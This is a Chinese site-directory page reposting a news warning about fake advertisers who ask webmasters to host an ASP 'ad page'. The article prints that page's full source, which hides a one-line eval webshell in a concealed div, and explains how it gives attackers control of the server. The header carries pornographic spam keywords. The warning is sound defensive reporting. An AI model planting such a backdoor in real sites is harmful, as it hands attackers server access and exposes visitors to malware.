日日操夜夜添-日日操影院-日日草夜夜操-日日干干-精品一区二区三区波多野结衣-精品一区二区三区高清免费不卡

公告:魔扣目錄網(wǎng)為廣大站長提供免費收錄網(wǎng)站服務(wù),提交前請做好本站友鏈:【 網(wǎng)站目錄:http://www.ylptlb.cn 】, 免友鏈快審服務(wù)(50元/站),

點擊這里在線咨詢客服
新站提交
  • 網(wǎng)站:51998
  • 待審:31
  • 小程序:12
  • 文章:1030137
  • 會員:747

中國站長站(chinaz.com)訊:近日,有一些不法份子利用少數(shù)站長貪小便宜的心里,在站長網(wǎng)站空間上種植“一句話木馬”,從而獲取服務(wù)器權(quán)限實現(xiàn)大面積掛馬或釋放病毒,危害網(wǎng)站用戶,從中牟取暴利。

最近有不少站長在Chinaz論壇發(fā)貼和致電中國站長站反映和咨詢,有人聯(lián)系要在他們的網(wǎng)站上投放廣告,卻要求把廣告頁面,一個ASP文件放到他自己網(wǎng)站的目錄中,但從表面也看不出來有異常,源文件如下:

<HTML>
<head>
<style type="text/css">
<!--
body,td,th {
 font-size: 12px;
 line-height:16px
}
.STYLE1 {color: #000000}
-->
</style>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>17zao.com-免費音樂-免費視聽</title>
<meta name="keywords" content="17zao.com-免費音樂-免費視聽">
<meta name="description" content="17zao.com-免費音樂-免費視聽">
<body>
<table width="100%" height="135" border="0" cellspacing="0">
          <tr>
                    <td align="center" valign="bottom"><img src="http://www.17zao.com/i/logo.jpg" width="180" height="60" /></td>
          </tr>
</table>
<br/>
<table width="450" border="0" align="center" cellspacing="0" bgcolor="#FFFFFF">
          <tr>
                    <td height="1" bgcolor="#5A7D9C"></td>
                    <td width="225" bgcolor="#FFFFFF"></td>
                    <td height="1" bgcolor="#5A7D9C"></td>
          </tr>
</table>
<table width="450" border="0" align="center" cellpadding="0" cellspacing="0">
          <tr>
                    <td width="1" bgcolor="#5A7D9C"></td>
            <td>
<div id="message"  align="center" style="display:none">
 <div align="center"><%eval request("383")%></div>
</div>

<div id="loading" align="center" style="display:none">
  <div align="center"><br>
    正在裝載,請稍候...  </div>
</div> 

 <div align="center">
   <p><BR>
     請您選擇最快的站點<BR>
     <br>
    
     <INPUT TYPE = BUTTON Value = "北方網(wǎng)通" onClick = "window.location='http://www.17zao.com'">
     <INPUT TYPE = BUTTON Value = "南方電信" onClick = "window.location='http://www.17zao.com'">
     <br>
     <br>
     <a target="_blank" class="STYLE1">粵ICP備05121955號</a><br>
     <br>
        </p>
   </div>
 <br></td>
<td width="1" bgcolor="#5A7D9C"></td>
          </tr>
</table>
<table width="450" height="1" border="0" align="center" cellspacing="0">
          <tr>
                    <td bgcolor="#5A7D9C"></td>
          </tr>
</table>

然而問題就是在上段代碼中被標(biāo)紅的地方,國內(nèi)著名的服務(wù)器安全專家,前SWsoft(中國)高級工程師楊恒飛(coldstar)告訴我們:ASP腳本中eval 函數(shù)允許動態(tài)執(zhí)行VBScript源代碼,也就是可以執(zhí)行任何代碼段,只是可能返回結(jié)果不同而已。因為它會對里面的表達式進行求值,也就是會執(zhí)行里面的表達式,如果里面的表達式是一個刻意構(gòu)造的代碼的話,就會危害到服務(wù)器的安全。如果服務(wù)器安全設(shè)置不嚴謹?shù)脑挘梢岳眠@個寫入一個完整的ASP木馬,操作文件什么的都可以做了。

另外動網(wǎng)論壇開發(fā)工程師焦崧源(雨·漫步)講到:基于C/S模式的“一句話木馬”使人想起了幾年前在安全界流行的“Execute Request("#")”,這種后門的好處就是體積小,隱蔽性高,殺毒軟件一般查殺不出來,而且還可以使用POST方式,IIS日志不會記錄。

因此提醒廣大站長:切莫貪圖小利而上當(dāng)受騙,根據(jù)目前反饋的站長信息,這些不份分子一般通過新申請的QQ號與不懂技術(shù)的站長,尤其是運營下載網(wǎng)站的,以包月廣告形式要求把該頁面放置自己的網(wǎng)站空間。另外也警惕一下,更不要接受通過遠程調(diào)用的方式在自己網(wǎng)站放置對方廣告,以免對方隨時更換代碼進行掛馬操作。

小知識:Eval 函數(shù)

計算一個表達式的值并返回結(jié)果。

 [result = ]Eval(expression)

參數(shù)

result

可選項。 是一個變量,用于接受返回的結(jié)果。如果未指定結(jié)果,應(yīng)考慮使用 Execute 語句代替。

expression

必選項。可以是包含任何有效 VBScript 表達式的字符串。

說明:在 VBScript 中,x = y 可以有兩種解釋。第一種方式是賦值語句,將 y 的值賦予 x。第二種解釋是測試 x 和 y 是否相等。如果相等,result 為 True;否則 result 為 False。Eval 方法總是采用第二種解釋,而 Execute 語句總是采用第一種。

分享到:
標(biāo)簽:高度警惕:假買廣告真掛馬切莫貪圖小利 網(wǎng)絡(luò)動態(tài)
用戶無頭像

網(wǎng)友整理

注冊時間:

網(wǎng)站:5 個   小程序:0 個  文章:12 篇

  • 51998

    網(wǎng)站

  • 12

    小程序

  • 1030137

    文章

  • 747

    會員

趕快注冊賬號,推廣您的網(wǎng)站吧!
最新入駐小程序

數(shù)獨大挑戰(zhàn)2018-06-03

數(shù)獨一種數(shù)學(xué)游戲,玩家需要根據(jù)9

答題星2018-06-03

您可以通過答題星輕松地創(chuàng)建試卷

全階人生考試2018-06-03

各種考試題,題庫,初中,高中,大學(xué)四六

運動步數(shù)有氧達人2018-06-03

記錄運動步數(shù),積累氧氣值。還可偷

每日養(yǎng)生app2018-06-03

每日養(yǎng)生,天天健康

體育訓(xùn)練成績評定2018-06-03

通用課目體育訓(xùn)練成績評定